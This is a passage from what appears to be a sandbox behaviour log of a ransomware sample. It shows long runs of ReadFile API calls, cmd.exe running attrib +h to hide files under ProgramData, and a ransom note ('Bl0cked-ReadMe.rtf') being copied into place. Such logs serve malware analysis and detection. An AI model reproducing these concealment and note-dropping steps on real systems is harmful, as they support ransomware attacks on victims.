lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, 
lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile 
(in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 
[0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 
lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.493] _close (_FileHandle=4) returned 0 [0127.493] FindNextFileW (in: hFindFile=0x36e6b8, lpFindFileData=0x18ed70 | out: lpFindFileData=0x18ed70) returned 0 [0127.493] GetLastError () returned 0x12 [0127.493] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.494] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.496] _close (_FileHandle=3) returned 0 [0127.496] GetConsoleTitleW (in: lpConsoleTitle=0x18f1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.496] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.496] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.496] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.497] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.497] _wcsicmp (_String1=".EXE", _String2=".BAT") 
returned 3 [0127.497] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.497] GetConsoleTitleW (in: lpConsoleTitle=0x18ef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.497] InitializeProcThreadAttributeList (in: lpAttributeList=0x18edc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ee8c | out: lpAttributeList=0x18edc4, lpSize=0x18ee8c) returned 1 [0127.497] UpdateProcThreadAttribute (in: lpAttributeList=0x18edc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18edc4, lpPreviousValue=0x0) returned 1 [0127.497] GetStartupInfoW (in: lpStartupInfo=0x18ed80 | out: lpStartupInfo=0x18ed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.497] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.497] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ee6c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", 
lpProcessInformation=0x18ee6c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xffc, dwThreadId=0x3c4)) returned 1 [0127.499] CloseHandle (hObject=0x50) returned 1 [0127.499] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.499] GetEnvironmentStringsW () returned 0x372dd0* [0127.499] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.499] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0127.573] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18ed60 | out: lpExitCode=0x18ed60*=0x0) returned 1 [0127.573] CloseHandle (hObject=0x4c) returned 1 [0127.573] _vsnwprintf (in: _Buffer=0x18eea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ed6c | out: _Buffer="00000000") returned 8 [0127.573] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.573] GetEnvironmentStringsW () returned 0x372dd0* [0127.573] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.573] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.573] GetEnvironmentStringsW () returned 0x372dd0* [0127.573] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.573] DeleteProcThreadAttributeList (in: lpAttributeList=0x18edc4 | out: lpAttributeList=0x18edc4) [0127.573] GetConsoleTitleW (in: lpConsoleTitle=0x18f1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.573] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18ea44, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0x36e6b8 [0127.574] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0x36e6b8 [0127.574] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.574] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.574] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.574] GetConsoleTitleW (in: lpConsoleTitle=0x18ef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.574] InitializeProcThreadAttributeList (in: lpAttributeList=0x18edc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ee8c | out: lpAttributeList=0x18edc4, lpSize=0x18ee8c) returned 1 [0127.574] UpdateProcThreadAttribute (in: lpAttributeList=0x18edc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18edc4, 
lpPreviousValue=0x0) returned 1 [0127.574] GetStartupInfoW (in: lpStartupInfo=0x18ed80 | out: lpStartupInfo=0x18ed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.575] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.575] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ee6c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessInformation=0x18ee6c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x80c, dwThreadId=0x81c)) returned 1 [0127.576] CloseHandle (hObject=0x4c) returned 1 [0127.576] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.576] GetEnvironmentStringsW () returned 0x373808* [0127.576] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.576] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0127.611] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ed60 | out: lpExitCode=0x18ed60*=0x0) returned 1 [0127.611] CloseHandle (hObject=0x50) returned 1 [0127.611] _vsnwprintf (in: _Buffer=0x18eea8, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x18ed6c | out: _Buffer="00000000") returned 8 [0127.611] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.611] GetEnvironmentStringsW () returned 0x373808* [0127.611] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.611] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.611] GetEnvironmentStringsW () returned 0x373808* [0127.611] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.611] DeleteProcThreadAttributeList (in: lpAttributeList=0x18edc4 | out: lpAttributeList=0x18edc4) [0127.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.611] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.612] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.612] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.612] SetConsoleInputExeNameW () returned 0x1 [0127.612] GetConsoleOutputCP () returned 0x1b5 [0127.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.612] exit (_Code=0) Process: id = "76" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE 
LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10076 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10077 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10078 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10079 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10080 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10081 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10082 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10083 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10084 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10085 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" 